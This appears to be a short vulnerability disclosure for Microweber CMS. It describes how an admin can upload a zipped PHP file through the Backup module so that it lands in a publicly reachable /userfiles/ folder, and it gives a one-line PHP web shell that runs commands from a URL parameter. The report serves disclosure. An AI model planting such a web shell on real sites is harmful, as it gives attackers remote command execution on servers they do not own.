Admin can use Backup
modules to upload a malicious PHP file, which can lead to RCE.
https://demo.microweber.org/demo/admin/view:modules/load_module:admin__backup
info2.php
<?php system($_GET['cm']); ?>
info2php.zip
, then click Upload your backup
.info2.php
is unzipped and located in /userfiles/
, and that malicious PHP file can be accessible by anyone:Remote code execution (RCE) attacks allow an attacker to remotely execute malicious code on a computer. The impact of an RCE vulnerability can range from malware execution to an attacker gaining full control over a compromised machine.